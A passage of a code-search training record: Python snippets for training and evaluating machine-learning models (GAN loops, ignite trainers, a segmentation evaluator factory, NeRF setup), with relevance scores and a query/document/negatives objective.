Unlabeled.\n _ = D(gpu(images))\n labeled_feature_layer = D.feature_layer\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n unlabeled_loss = feature_distance_loss(unlabeled_feature_layer, labeled_feature_layer,\n scale=False) * settings.unlabeled_loss_multiplier\n unlabeled_loss.backward()\n # Fake.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n z = torch.from_numpy(MixtureModel([norm(-settings.mean_offset, 1), norm(settings.mean_offset, 1)]).rvs(\n size=[current_batch_size, 100]).astype(np.float32))\n # z = torch.randn(settings.batch_size, noise_size)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples.detach())\n fake_feature_layer = D.feature_layer\n fake_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer,\n order=1).neg() * settings.fake_loss_multiplier\n fake_loss.backward()\n # Feature norm loss.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n feature_norm_loss = (unlabeled_feature_layer.norm(dim=1).mean() - 1).pow(2)\n feature_norm_loss.backward()\n # Gradient penalty.\n if settings.gradient_penalty_on:\n alpha = gpu(Variable(torch.rand(2)))\n alpha = alpha / alpha.sum(0)\n interpolates = (alpha[0] * gpu(Variable(unlabeled_images, requires_grad=True)) +\n alpha[1] * gpu(Variable(fake_examples.detach().data, requires_grad=True)))\n _ = D(interpolates)\n interpolates_predictions = D.feature_layer\n gradients = torch.autograd.grad(outputs=interpolates_predictions, inputs=interpolates,\n grad_outputs=gpu(torch.ones(interpolates_predictions.size())),\n create_graph=True, only_inputs=True)[0]\n gradient_penalty = ((gradients.norm(dim=1) - 1) ** 2).mean() * settings.gradient_penalty_multiplier\n gradient_penalty.backward()\n # Discriminator update.\n discriminator_optimizer.step()\n # Generator.\n if step % 1 == 0:\n generator_optimizer.zero_grad()\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer.detach()\n z = torch.randn(current_batch_size, 100)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples)\n fake_feature_layer = D.feature_layer\n generator_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer)\n generator_loss.backward()\n generator_optimizer.step()\n\n running_example_count += images.size()[0]\n if step % settings.summary_step_period == 0 and step != 0:\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n summary_writer.add_image('Comparison', comparison_image, global_step=step)\n fake_images_image = torchvision.utils.make_grid(fake_examples.data[:9], nrow=3)\n summary_writer.add_image('Fake', fake_images_image, global_step=step)\n print('\\rStep {}, {}...'.format(step, datetime.datetime.now() - step_time_start), end='')\n step_time_start = datetime.datetime.now()\n for name, running_scalar in running_scalars.items():\n mean_scalar = running_scalar / running_example_count\n summary_writer.add_scalar(name, mean_scalar, global_step=step)\n running_scalars[name] = 0\n running_example_count = 0\n for validation_examples in validation_dataset_loader:\n images, labels, _ = validation_examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n predicted_labels, predicted_counts = D(images)\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n count_mae = torch.abs(predicted_counts - labels.sum(1).sum(1)).mean()\n count_me = (predicted_counts - labels.sum(1).sum(1)).mean()\n validation_running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n validation_running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n validation_running_scalars['Test/Count MAE'] += count_mae.data[0]\n validation_running_scalars['Labeled/Count ME'] += count_me.data[0]\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n validation_summary_writer.add_image('Comparison', comparison_image, global_step=step)\n for name, running_scalar in validation_running_scalars.items():\n mean_scalar = running_scalar / len(validation_dataset)\n validation_summary_writer.add_scalar(name, mean_scalar, global_step=step)\n validation_running_scalars[name] = 0\n step += 1\n epoch += 1\n if epoch != 0 and epoch % settings.save_epoch_period == 0:\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n print('Finished Training')\n return trial_directory", "def training_step(self, **kwargs):\n raise NotImplementedError", "def make_keras_like(trainer, evaluator, validation_loader):\n training_history = {'accuracy': [], 'loss': []}\n validation_history = {'accuracy': [], 'loss': []}\n last_epoch = []\n\n RunningAverage(output_transform=lambda x: x[0]).attach(trainer, 'loss')\n RunningAverage(Accuracy(output_transform=lambda x: (x[1], x[2]))).attach(trainer, 'accuracy')\n\n prog_bar = ProgressBar()\n prog_bar.attach(trainer, ['loss', 'accuracy'])\n\n prog_bar_vd = ProgressBar()\n prog_bar_vd.attach(evaluator)\n from ignite.handlers import Timer\n\n timer = Timer(average=True)\n timer.attach(trainer, start=Events.EPOCH_STARTED,\n resume=Events.EPOCH_STARTED,\n pause=Events.EPOCH_COMPLETED,\n step=Events.EPOCH_COMPLETED)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(trainer):\n metrics = trainer.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n last_epoch.append(0)\n training_history['accuracy'].append(accuracy)\n training_history['loss'].append(loss)\n train_msg = \"Train Epoch {}: acc: {:.2f}% loss: \".format(trainer.state.epoch, accuracy) + \\\n \"{:.2f}, train time: {:.2f}s\".format(loss, timer.value())\n\n evaluator.run(validation_loader)\n metrics = evaluator.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n validation_history['accuracy'].append(accuracy)\n validation_history['loss'].append(loss)\n val_msg = \"Valid Epoch {}: acc: {:.2f}% loss: {:.2f}\".format(trainer.state.epoch, accuracy, loss)\n\n prog_bar_vd.log_message(train_msg + \" --- \" + val_msg)", "def trainer(self):\n return self._trainer", "def __init__(self,\n model_cfg: dict,\n trainer_cfg: dict,\n plan: dict,\n **kwargs\n ):\n super().__init__()\n self.model_cfg = model_cfg\n self.trainer_cfg = trainer_cfg\n self.plan = plan\n\n self.model = self.from_config_plan(\n model_cfg=self.model_cfg,\n plan_arch=self.plan[\"architecture\"],\n plan_anchors=self.plan[\"anchors\"],\n )\n\n self.example_input_array_shape = (\n 1, plan[\"architecture\"][\"in_channels\"], *plan[\"patch_size\"],\n )\n\n self.epoch_start_tic = 0\n self.epoch_end_toc = 0", "def train():\n import trace\n trace.train()", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def train_model(args: argparse.Namespace, hp: HParams, extension_architecture: str, timestamp: str,\n logger: logging.Logger) -> None:\n # 1. Check if we have to train a single tier or a complete model (with several tiers)\n if args.tier is not None:\n # 1.1 Argument tier was defined. Only that tier will be trained.\n logging.info(f\"Training single tier of the model: Tier {args.tier}\")\n\n # 2. Setup tensorboard logging\n # 2.1 Create tensorboard logs directory (tensorboard requires a different folder for each\n # run of the model, in this case every run to train a tier) so we add the extension of the\n # network's architecture of this run and the timestamp to identify it completely\n tensorboard_dir = f\"{hp.logging.dir_log_tensorboard}{extension_architecture}_\" \\\n f\"{timestamp}_tier{args.tier}\"\n Path(tensorboard_dir).mkdir(parents=True, exist_ok=True)\n # 2.2 Create tensorboard writer\n tensorboardwriter = TensorboardWriter(hp, tensorboard_dir)\n\n # 3. Start training of the tier\n train_tier(args, hp, args.tier, extension_architecture, timestamp, tensorboardwriter,\n logger)\n\n tensorboardwriter.close()\n\n else:\n # 1.2 Argument tier was not defined. Train all tiers of the model.\n logging.info(\"Training all tiers of the model\")\n\n for tier in range(1, hp.network.n_tiers + 1):\n # 2. Setup tensorboard logging (one for every tier)\n # 2.1 Create tensorboard logs directory (tensorboard requires a different folder for\n # each run of the model, in this case every run to train a tier) so we add the extension\n # of the network's architecture of this run and the timestamp to identify it completely\n tensorboard_dir = hp.logging.dir_log_tensorboard + extension_architecture \\\n + f\"_{timestamp}_tier{tier}\"\n Path(tensorboard_dir).mkdir(parents=True, exist_ok=True)\n # 2.2 Create tensorboard writer\n tensorboardwriter = TensorboardWriter(hp, tensorboard_dir)\n\n # 3. Start training of the tier\n train_tier(args, hp, tier, extension_architecture, timestamp, tensorboardwriter, logger)\n\n tensorboardwriter.close()\n del tensorboardwriter", "def __init__(self, vocabulary, decorator, max_sequence_length=256, no_cuda=True, mode=\"train\"):\n self.vocabulary = vocabulary\n self.max_sequence_length = max_sequence_length\n self.network = decorator\n self._model_modes = GenerativeModelRegimeEnum()\n\n if torch.cuda.is_available() and not no_cuda:\n self.network.cuda()\n\n self._nll_loss = tnn.NLLLoss(reduction=\"none\", ignore_index=0)\n self.set_mode(mode)", "def trainer(model,\n optimizer,\n dataset,\n count_of_epoch=5,\n batch_size=64,\n callback=None,\n progress=None):\n iterations = range(count_of_epoch)\n\n if progress is not None:\n iterations = progress(iterations)\n\n for it in iterations:\n\n batch_generator = DataLoader(\n dataset=dataset,\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True)\n\n train_epoch(\n \tmodel=model,\n train_generator=batch_generator,\n optimizer=optimizer,\n callback=callback)\n\n return", "def __init__(self, tagger):\n self.tagger = tagger\n self.classifier = Perceptron()", "def train():\n # YOUR TRAINING CODE GOES HERE", "def main(config: DictConfig) -> None:\n\n if config.test:\n # TODO: clean up current working directory with test=true\n experiment_path = os.getcwd().replace(\"test=true,\", \"\").replace(\"test=True,\", \"\")\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n summary, report = trainer.test()\n print(summary)\n print(report)\n else:\n experiment_path = os.getcwd()\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n trainer.run()\n print(\"Launched training. Press CTRL+C to stop.\")\n print(f\"Logs available at {os.getcwd()}\")", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--identifier\", required=True,\n help=\"A short name/identifier for your experiment, e.g. 'ex42b'.\")\n args = parser.parse_args()\n\n train(args)", "def train(self, src, labels): # real signature unknown; restored from __doc__\n pass", "def __init__(\n self,\n hparams: BaselineModel.HParams = None,\n config: Config = None,\n trainer_options: TrainerConfig = None,\n **kwargs,\n ):\n super().__init__(\n hparams=hparams, config=config, trainer_options=trainer_options, **kwargs\n )", "def train(self, transducer, corpus, feat_inst=None):\n pass", "def train(train_dataset: torch.utils.data.Dataset, test_dataset: torch.utils.data.Dataset,\n training_config: dict = train_config, global_config: dict = global_config):\n\n for path in global_config.values():\n create_dirs(path)\n\n # wrap datasets with Dataloader classes\n train_loader = torch.utils.data.DataLoader(train_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n test_loader = torch.utils.data.DataLoader(test_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n\n # model name & paths\n name = \"_\".join([train_config[\"DATE\"], train_config[\"SESSION_NAME\"]])\n modelpath = os.path.join(global_config[\"WEIGHT_DIR\"], name)\n\n # instantiate model\n model = training_config[\"MODEL\"](**training_config[\"MODEL_CONFIG\"])\n\n optimizer = training_config[\"OPTIMIZER\"](model.parameters(),\n **training_config[\"OPTIMIZER_CONFIG\"])\n\n # set up ignite engine\n training_config[\"METRICS\"].update({\"loss\" : Loss(training_config[\"LOSS\"])})\n trainer = create_supervised_trainer(model=model, optimizer=optimizer,\n loss_fn=training_config[\"LOSS\"],\n device=training_config[\"DEVICE\"])\n evaluator = create_supervised_evaluator(model,\n metrics=training_config[\"METRICS\"],\n device=training_config[\"DEVICE\"])\n\n\n # tensorboardX setup\n log_dir = os.path.join(global_config[\"LOG_DIR\"], \"tensorboardx\", name)\n create_dirs(log_dir)\n writer = SummaryWriter(logdir=log_dir)\n\n # log using the logging tool\n logger = log.Log(training_config, run_name=train_config['SESSION_NAME'])\n\n @trainer.on(Events.ITERATION_COMPLETED)\n def log_training(engine):\n iteration = (engine.state.iteration - 1) % len(train_loader) + 1\n writer.add_scalar(\"training/loss\", engine.state.output, engine.state.iteration)\n if iteration % 4 == 0:\n print(\"\\repoch[{}] iteration[{}/{}] loss: {:.2f} \".format(engine.state.epoch,\n iteration, len(train_loader),\n engine.state.output), end=\"\")\n\n # generic evaluation function\n def evaluate(engine, loader):\n evaluator.run(loader)\n metrics = evaluator.state.metrics\n return metrics\n\n # training data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_training_results(engine):\n print(\"\\ntraining results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, train_loader)\n print(metrics)\n for key, value in metrics.items():\n logger.log_metric(key, value)\n writer.add_scalar(\"training/avg_{}\".format(key), value, engine.state.epoch)\n\n # test data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(engine):\n print(\"test results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, test_loader)\n print(metrics)\n for key, value in metrics.items():\n writer.add_scalar(\"validation/avg_{}\".format(key), value, engine.state.epoch)\n\n # model checkpointing\n @trainer.on(Events.EPOCH_COMPLETED)\n def model_checkpoint(engine):\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Checkpoint saved to {}\".format(modelpath + \".pth\"))\n\n # training iteration\n try:\n trainer.run(train_loader, max_epochs=training_config[\"EPOCHS\"])\n except KeyboardInterrupt:\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Model saved to {}\".format(modelpath + \".pth\"))\n raise KeyboardInterrupt\n\n # write weights\n torch.save(model.state_dict(), modelpath + \".pth\")\n\n # write csv log file\n log_content = training_config.copy()\n evaluator.run(test_loader)\n log_content[\"VAL_METRICS\"] = evaluator.state.metrics\n log_path = os.path.join(global_config[\"LOG_DIR\"], training_config[\"LOGFILE\"])\n write_log(log_path, log_content)\n\n logger.end_run()\n \n return evaluator.state.metrics[\"training/avg_loss\"]", "def __init__(self,\n model: PreTrainedModel,\n tokenizer: PreTrainedTokenizer,\n optimizer: torch.optim.Optimizer,\n n_epochs: int,\n labels2ind: Dict[str, int],\n scheduler: Optional[torch.optim.lr_scheduler.LambdaLR] = None,\n device: str = 'cpu',\n clipping: Optional[Union[int, float]] = None,\n accumulate_grad_every: int = 1,\n print_every: int = 10,\n print_val_mistakes: bool = False,\n output_dir: str = './'):\n\n self.tokenizer = tokenizer\n self.model = model\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.n_epochs = n_epochs\n self.labels2ind = labels2ind\n self.inds2labels = {v: k for k, v in self.labels2ind.items()}\n self.device = device\n self.clipping = clipping\n self.accumulate_grad_every = accumulate_grad_every\n self.print_every = print_every\n self.print_val_mistakes = print_val_mistakes\n self.output_dir = output_dir\n\n os.makedirs(self.output_dir, exist_ok=True)", "def __init__(self):\n\n # Load the configuration and model using ABSOLUTE PATHS\n self.configuration_file = '/aaio/data/trainer_config.yaml'\n self.model_path = glob.glob('/aaio/data/*/Learner')[0]\n print('model_path', self.model_path)\n\n self.brain = BrainParameters(brain_name='Learner',\n camera_resolutions=[{'height': 84, 'width': 84, 'blackAndWhite': False}],\n num_stacked_vector_observations=1,\n vector_action_descriptions=['', ''],\n vector_action_space_size=[3, 3],\n vector_action_space_type=0, # corresponds to discrete\n vector_observation_space_size=3\n )\n self.trainer_params = yaml.load(open(self.configuration_file))['Learner']\n self.trainer_params['keep_checkpoints'] = 0\n self.trainer_params['model_path'] = self.model_path\n\n self.policy = PPOPolicy(brain=self.brain,\n seed=0,\n trainer_params=self.trainer_params,\n is_training=False,\n load=True)\n self.memory_in = None\n self.use_recurrent = self.trainer_params['model_architecture']['use_recurrent']\n self._arena_map = None\n if self.trainer_params['model_architecture']['architecture'] in ['map', 'wba_prize']:\n self._map_side = self.trainer_params['model_architecture']['map_encoding']['map_side']\n else:\n self._map_side = None", "def register_trainer(cls, to_register=None, *, name: Optional[str] = None):\n # from habitat_baselines.common.base_trainer import BaseTrainer\n from pointnav_vo.rl.common.base_trainer import BaseTrainer\n\n return cls._register_impl(\"trainer\", to_register, name, assert_type=BaseTrainer)", "def train(self, batch_training=False):\n raise NotImplementedError", "def create_inferelator_workflow(regression=RegressionWorkflow, workflow=WorkflowBase):\n\n # Decide which preprocessing/postprocessing workflow to use\n # String arguments are parsed for convenience in the run script\n if isinstance(workflow, basestring):\n if workflow == \"base\":\n workflow_class = WorkflowBase\n elif workflow == \"tfa\":\n from inferelator.tfa_workflow import TFAWorkFlow\n workflow_class = TFAWorkFlow\n elif workflow == \"amusr\":\n from inferelator.amusr_workflow import SingleCellMultiTask\n workflow_class = SingleCellMultiTask\n elif workflow == \"single-cell\":\n from inferelator.single_cell_workflow import SingleCellWorkflow\n workflow_class = SingleCellWorkflow\n else:\n raise ValueError(\"{val} is not a string that can be mapped to a workflow class\".format(val=workflow))\n # Or just use a workflow class directly\n elif inspect.isclass(workflow) and issubclass(workflow, WorkflowBase):\n workflow_class = workflow\n else:\n raise ValueError(\"Workflow must be a string that maps to a workflow class or an actual workflow class\")\n\n # Decide which regression workflow to use\n # Return just the workflow if regression is set to None\n if regression is None:\n return workflow_class\n # String arguments are parsed for convenience in the run script\n elif isinstance(regression, basestring):\n if regression == \"bbsr\":\n from inferelator.regression.bbsr_python import BBSRRegressionWorkflow\n regression_class = BBSRRegressionWorkflow\n elif regression == \"elasticnet\":\n from inferelator.regression.elasticnet_python import ElasticNetWorkflow\n regression_class = ElasticNetWorkflow\n elif regression == \"amusr\":\n from inferelator.regression.amusr_regression import AMUSRRegressionWorkflow\n regression_class = AMUSRRegressionWorkflow\n else:\n raise ValueError(\"{val} is not a string that can be mapped to a regression class\".format(val=regression))\n # Or just use a regression class directly\n elif inspect.isclass(regression) and issubclass(regression, RegressionWorkflow):\n regression_class = regression\n else:\n raise ValueError(\"Regression must be a string that maps to a regression class or an actual regression class\")\n\n class RegressWorkflow(regression_class, workflow_class):\n regression_type = regression_class\n\n return RegressWorkflow", "def __init__(self, encoded_network, input_shape, n_classes, batch_size=256,\n log_path=\"./trainer\", variable_scope=\"custom\"):\n super(DefaultNASTrainer, self).__init__(\n encoded_network=encoded_network,\n input_shape=input_shape,\n n_classes=n_classes,\n batch_size=batch_size,\n log_path=log_path,\n variable_scope=variable_scope\n )\n self._set_estimator()", "def main(politician, epochs):\n train_path = f\"..\\\\data\\\\{politician}\\\\training_data.txt\"\n val_path = f\"..\\\\data\\\\{politician}\\\\validation_data.txt\"\n\n tokenizer = AutoTokenizer.from_pretrained(\"anonymous-german-nlp/german-gpt2\")\n\n special_tokens_dict = {\n 'bos_token': '<BOS>',\n 'eos_token': '<EOS>',\n 'pad_token': '<PAD>',\n 'additional_special_tokens': ['<EOQ>']\n }\n tokenizer.add_special_tokens(special_tokens_dict)\n\n train_dataset, test_dataset, data_collator = load_dataset(train_path, val_path, tokenizer)\n\n model = AutoModelWithLMHead.from_pretrained(\"anonymous-german-nlp/german-gpt2\")\n model.resize_token_embeddings(len(tokenizer))\n\n training_args = TrainingArguments(\n output_dir=f\".\\\\output-models\\\\gpt2-{politician}-{epochs}\", # output directory\n overwrite_output_dir=True, # overwrite the content of the output directory\n num_train_epochs=epochs, # number of training epochs\n per_device_train_batch_size=32, # batch size for training\n per_device_eval_batch_size=64, # batch size for evaluation\n eval_steps=400, # Number of update steps between two evaluations.\n save_steps=800, # after # steps model is saved\n warmup_steps=500, # number of warmup steps for learning rate scheduler\n )\n\n trainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=test_dataset,\n prediction_loss_only=True,\n )\n\n trainer.train()\n trainer.save_model()", "def train(self):\n return", "def from_config_file(cls, config, copy_config=True):\n\n config = Config.from_file(config)\n trainer = Trainer.from_config(config, copy_config)\n\n return trainer", "def __init__(self, estimator, target_language='java',\n target_method='predict', **kwargs):\n super(SVC, self).__init__(estimator, target_language=target_language,\n target_method=target_method, **kwargs)\n self.estimator = estimator", "def create_nerf(args, return_styles=False):\n if SEED:\n torch.manual_seed(1234)\n\n embed_fn, input_ch = get_embedder(args.multires, args.i_embed)\n\n input_ch_views = 0\n style_dim = args.style_dim\n\n embeddirs_fn = None\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed)\n output_ch = 5 if args.N_importance > 0 else 4\n model = NeRF(D_mean=args.D_mean, W_mean=args.W_mean, D_instance=args.D_instance, W_instance=args.W_instance, D_fusion=args.D_fusion, W_fusion=args.W_fusion, D_sigma=args.D_sigma,\n D_rgb=args.D_rgb, W_rgb=args.W_rgb, W_bottleneck=args.W_bottleneck, input_ch=input_ch, output_ch=output_ch, input_ch_views=input_ch_views, style_dim=style_dim,\n embed_dim=args.embed_dim, style_depth=args.style_depth, shared_shape=args.shared_shape, use_viewdirs=args.use_viewdirs, separate_codes=args.separate_codes, use_styles=args.use_styles).to(device)\n\n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = NeRF(D_mean=args.D_mean, W_mean=args.W_mean, D_instance=args.D_instance, W_instance=args.W_instance, D_fusion=args.D_fusion, W_fusion=args.W_fusion, D_sigma=args.D_sigma,\n D_rgb=args.D_rgb, W_rgb=args.W_rgb, W_bottleneck=args.W_bottleneck, input_ch=input_ch, output_ch=output_ch, input_ch_views=input_ch_views, style_dim=style_dim, embed_dim=args.embed_dim, style_depth=args.style_depth, shared_shape=args.shared_shape, use_viewdirs=args.use_viewdirs, separate_codes=args.separate_codes, use_styles=args.use_styles).to(device)\n grad_vars += list(model_fine.parameters())\n\n def network_query_fn(inputs, styles, viewdirs, network_fn, alpha, feature): return run_network(inputs, styles, viewdirs, network_fn, alpha, feature,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk)\n\n # Create optimizer\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n\n ##########################\n\n ckpt = load_checkpoint(os.path.join(basedir, expname), args) # Load checkpoints\n if args.load_from is not None:\n print('Loading from', args.load_from)\n ckpt = torch.load(args.load_from)\n\n if ckpt is not None and not args.skip_loading:\n start = ckpt['global_step']\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n ##########################\n\n render_kwargs_train = {\n 'network_query_fn': network_query_fn,\n 'perturb': args.perturb,\n 'perturb_coarse': args.perturb_coarse,\n 'N_importance': args.N_importance,\n 'network_fine': model_fine,\n 'N_samples': args.N_samples,\n 'network_fn': model,\n 'use_viewdirs': args.use_viewdirs,\n 'white_bkgd': args.white_bkgd,\n 'raw_noise_std': args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data\n render_kwargs_train['ndc'] = False\n render_kwargs_train['lindisp'] = False\n\n render_kwargs_test = {k: render_kwargs_train[k] for k in render_kwargs_train}\n render_kwargs_test['perturb'] = False\n render_kwargs_test['perturb_coarse'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n if return_styles:\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, ckpt['styles']\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer" ]
[ "0.654834", "0.6447384", "0.636751", "0.6288383", "0.61592156", "0.6154132", "0.6132767", "0.6132448", "0.6092635", "0.59407616", "0.59181774", "0.5789498", "0.5706349", "0.5698838", "0.5692006", "0.56582886", "0.5657751", "0.56492114", "0.56327677", "0.56257826", "0.562098", "0.5593179", "0.5586666", "0.5580963", "0.558002", "0.5577944", "0.55727714", "0.55706894", "0.5549665", "0.55483973", "0.5547859", "0.55386436", "0.5531661", "0.553155", "0.551582", "0.5488575", "0.5464366", "0.54613787", "0.5450037", "0.5446642", "0.5442474", "0.54401374", "0.54361796", "0.5431447", "0.5422416", "0.5419983", "0.54150254", "0.54121727", "0.5404032", "0.54025716", "0.5389587", "0.53812426", "0.53715163", "0.5367804", "0.5355616", "0.53453726", "0.5330658", "0.5325996", "0.5325088", "0.53234094", "0.52966994", "0.52957135", "0.52957135", "0.52957135", "0.52957135", "0.52957135", "0.5289821", "0.5289624", "0.52853453", "0.52836406", "0.52836406", "0.5271386", "0.5267138", "0.52666956", "0.5263825", "0.5257126", "0.524936", "0.5247703", "0.52460504", "0.5222929", "0.522189", "0.5195374", "0.51934767", "0.5191596", "0.5188644", "0.51792514", "0.5175902", "0.5155158", "0.51534927", "0.5134928", "0.5134868", "0.51330394", "0.51263547", "0.51260924", "0.5123242", "0.5121133", "0.51192623", "0.5111311", "0.51111126", "0.5108734" ]
0.5852004
11
Factory function for creating an evaluator for supervised segmentation models.
def create_supervised_evaluator( model, prepare_batch, metrics=None, device=None, non_blocking=False, output_transform=val_transform, ): metrics = metrics or {} if device: model.to(device) def _inference(engine, batch): model.eval() with torch.no_grad(): x, y, ids, patch_locations = prepare_batch(batch, device=device, non_blocking=non_blocking) y_pred = model(x) y_pred = _upscale_model_output(y_pred, x) return output_transform(x, y, y_pred, ids, patch_locations) engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)", "def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n 